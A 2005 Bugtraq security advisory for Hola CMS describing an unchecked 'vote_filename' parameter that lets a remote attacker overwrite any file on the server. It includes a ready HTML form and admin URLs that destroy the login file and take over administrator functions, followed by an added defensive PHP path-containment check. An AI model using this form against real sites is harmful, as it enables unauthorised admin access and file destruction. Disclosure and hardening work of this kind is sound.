Message-ID: <20050312224555.4397.qmail@www.securityfocus.com>
Date: 12 Mar 2005 22:45:55 -0000
From: Virginity Security <advisory05@...fiweb.de>
To: bugtraq@...urityfocus.com
Subject: Virginity Security Advisory 2005-001 : Hola CMS - File
    destruction and System access





- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-001
- - - --------------------------------------------------------------------
             DATE : 2005-03-12 15:45 GMT
             TYPE : remote
VERSIONS AFFECTED : <== hola-cms-1.4.9 (http://holacms.drunkencat.net/)
           AUTHOR : Virginity
  ADVISORY NUMBER : 003
- - - --------------------------------------------------------------------


Description:

I found a serious security hole in Hola CMS:
The Vote-Module doesn't check whether the submitted "vote_filename" variable
is in the holaDB/votes/ directory where it should be.
So anything could be added in there. This can be used to manipulate or destroy system files
- not only the ones in the CMS but every file on the whole server!!!
Below I will show an example of how to destroy the login-authentication file and gain access
to admin-functions!

Author of the Software has been notified.

- - - --------------------------------------------------------------------


Example:

Create this html form (that makes it easier to use it on multiple targets):

<form action="http://[target]/[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename" value="admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>

Of course you'll have to edit [target] and [site-with-vote] to match your site!
Now when you push the button the first lines of the multiuser.php (which
includes the authentication mechanism) get overwritten and by calling
http://[target]/admin/index_cms.php
you have access to all user functions, and by calling
http://[target]/admin/[module you want].php?username=siteadmin
to all siteadmin functions!

But that's just for that lame CMS... of course you could attack operating-system files
or do other funny things. NO! Please don't do it! Just test on your own system :P
- - - --------------------------------------------------------------------


Solution:

Author wasn't nice last time so no more help for this piece of vuln software.
But I strongly recommend you to use some other software since there are
still many other vulns in it!

- - - --------------------------------------------------------------------


Personal note:

So you thought this girl couldn't do it anymore? Here it goes... read and enjoy!
For contact please don't mail me cuz my mailbox is full of spam :(
But if you want to find me on IRC you'll make it!

- - - --------------------------------------------------------------------
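
Added example, not part of the advisory and not Hola CMS code: one way to write the containment check that the Description says the vote module lacks, rejecting any "vote_filename" that does not resolve to a regular file inside holaDB/votes/. The function name resolve_vote_file(), the demo files poll1.txt and link.txt, and the premise that vote files already exist before a vote is cast are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not Hola CMS code. resolve_vote_file() is a hypothetical name.
// Returns the canonical path of a vote file inside $votesDir, or null to reject.
function resolve_vote_file(string $votesDir, string $submitted): ?string
{
    // Allowlist: a bare file name, no separators, no NUL byte, no leading dot.
    if (!preg_match('/\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/', $submitted)) {
        return null;
    }
    $base = realpath($votesDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and fails for missing files. Assumption:
    // vote files are created by the administrator, never by the voter.
    $path = realpath($base . DIRECTORY_SEPARATOR . $submitted);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Compare against the base plus a separator so a sibling directory such
    // as "votes_old" cannot pass as "votes".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo tree in a temp directory standing in for the CMS root.
$root = sys_get_temp_dir() . '/hola_demo_' . bin2hex(random_bytes(4));
mkdir("$root/holaDB/votes", 0700, true);
mkdir("$root/admin/multiuser", 0700, true);
file_put_contents("$root/holaDB/votes/poll1.txt", "0\n");
file_put_contents("$root/admin/multiuser/multiuser.php", "placeholder\n");
// A symlink inside votes/ that points at the protected file (POSIX only).
symlink("$root/admin/multiuser/multiuser.php", "$root/holaDB/votes/link.txt");

$names = ['poll1.txt', 'admin/multiuser/multiuser.php', 'link.txt'];
foreach ($names as $name) {
    $resolved = resolve_vote_file("$root/holaDB/votes", $name);
    printf("%-32s %s\n", $name, $resolved === null ? 'rejected' : 'accepted');
}
```

Call the check before any open or write on the vote file and treat a null result as a failed request.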

